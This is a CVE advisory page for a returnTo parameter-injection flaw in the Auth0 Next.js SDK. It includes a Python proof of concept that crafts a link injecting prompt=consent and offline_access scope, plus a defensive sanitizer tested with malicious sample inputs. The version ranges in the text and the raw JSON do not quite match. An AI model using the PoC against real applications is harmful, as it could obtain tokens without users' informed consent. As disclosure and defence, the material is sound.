Security Vulnerability Report
CVE-2025-67716 CVSS 5.7 MEDIUM

CVE-2025-67716

Published: 2025-12-11 01:16:01
Last Modified: 2026-03-06 19:29:10

Description

The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. Versions 4.9.0 through 4.12.1 contain an input-validation flaw in the returnTo parameter, which could allow attackers to inject unintended OAuth query parameters into the Auth0 authorization request. Successful exploitation may result in tokens being issued with unintended parameters. This issue is fixed in version 4.13.0.

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:auth0:nextjs-auth0:*:*:*:*:*:node.js:*:* - VULNERABLE
Auth0 Next.js SDK >= 4.9.0 and < 4.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import urllib.parse

# Malicious returnTo URL that injects OAuth parameters
malicious_return_to = "https://victim-app.com/callback?prompt=consent&scope=openid%20profile%20email%20offline_access"

# Encode the malicious returnTo URL
encoded_return_to = urllib.parse.quote(malicious_return_to, safe='')

# Construct the attack URL
attack_url = f"https://victim-app.com/api/auth/login?returnTo={encoded_return_to}"

print(f"Attack URL: {attack_url}")
print("\nWhen victim clicks this link, the OAuth authorization request will include injected parameters:")
print("- prompt=consent (forces consent screen)")
print("- scope extended with offline_access (requests refresh token)")
```
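As an added defensive example, not code from the advisory or from the auth0/nextjs-auth0 project, the check below shows how an application can validate a returnTo value before it reaches the login route: it rejects cross-origin targets and any query key that collides with an OAuth authorization-request parameter, which is the injection shape the PoC above relies on. The function name, the reserved-parameter list and the sample inputs are assumptions, and this is not the SDK's own fix.

```javascript
// Added example (not the advisory's or the SDK's code): validate a returnTo
// value before handing it to a login handler. Names and lists are assumptions.
const RESERVED_OAUTH_PARAMS = new Set([
  "prompt", "scope", "response_type", "response_mode", "redirect_uri",
  "client_id", "state", "nonce", "code_challenge", "code_challenge_method",
  "audience", "connection", "login_hint", "max_age", "organization",
]);

// Returns { ok: true, returnTo } holding a same-origin path (plus query/hash),
// or { ok: false, reason } when the value must be rejected.
function sanitizeReturnTo(raw, appOrigin) {
  if (typeof raw !== "string" || raw === "") {
    return { ok: true, returnTo: "/" }; // default landing page
  }
  let url;
  try {
    // Relative paths resolve against the app origin; absolute URLs keep their own.
    url = new URL(raw, appOrigin);
  } catch {
    return { ok: false, reason: "unparseable" };
  }
  // Same-origin only: catches "https://evil.example", "//evil.example" and
  // "/\\evil.example" (a backslash is a slash in the WHATWG parser).
  if (url.origin !== appOrigin) {
    return { ok: false, reason: "cross-origin" };
  }
  // Query keys that collide with OAuth/OIDC authorization-request parameters
  // are the injection the advisory describes; refuse rather than strip them.
  const clashes = [...url.searchParams.keys()].filter((k) => RESERVED_OAUTH_PARAMS.has(k));
  if (clashes.length > 0) {
    return { ok: false, reason: `reserved OAuth parameter(s): ${clashes.join(", ")}` };
  }
  return { ok: true, returnTo: url.pathname + url.search + url.hash };
}

// Constructed sample inputs (hypothetical origin, mirroring the PoC shape).
const APP_ORIGIN = "https://victim-app.com";
const SAMPLES = [
  "/dashboard?tab=billing",                                                   // benign
  "/callback?prompt=consent&scope=openid%20profile%20email%20offline_access", // PoC shape
  "https://evil.example/phish",                                               // open redirect
  "//evil.example/phish",                                                     // protocol-relative
];

for (const s of SAMPLES) {
  console.log(s, "=>", JSON.stringify(sanitizeReturnTo(s, APP_ORIGIN)));
}
```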

References

https://github.com/auth0/nextjs-auth0/commit/35eb321de3345ccf23e8c0d6f66c9f2f2f57d26c (Patch)
https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-mr6f-h57v-rpj5 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67716", "sourceIdentifier": "[email protected]", "published": "2025-12-11T01:16:00.890", "lastModified": "2026-03-06T19:29:09.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. Versions 4.9.0 through 4.12.1 contain an input-validation flaw in the returnTo parameter, which could allow attackers to inject unintended OAuth query parameters into the Auth0 authorization request. Successful exploitation may result in tokens being issued with unintended parameters. This issue is fixed in version 4.13.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-184"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:auth0:nextjs-auth0:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "4.9.0", "versionEndExcluding": "4.12.1", "matchCriteriaId": "49F414AC-40B3-474B-B15C-D6962933338C"}]}]}], "references": [{"url": "https://github.com/auth0/nextjs-auth0/commit/35eb321de3345ccf23e8c0d6f66c9f2f2f57d26c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/auth0/nextjs-auth0/security/advisories/GHSA-mr6f-h57v-rpj5", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}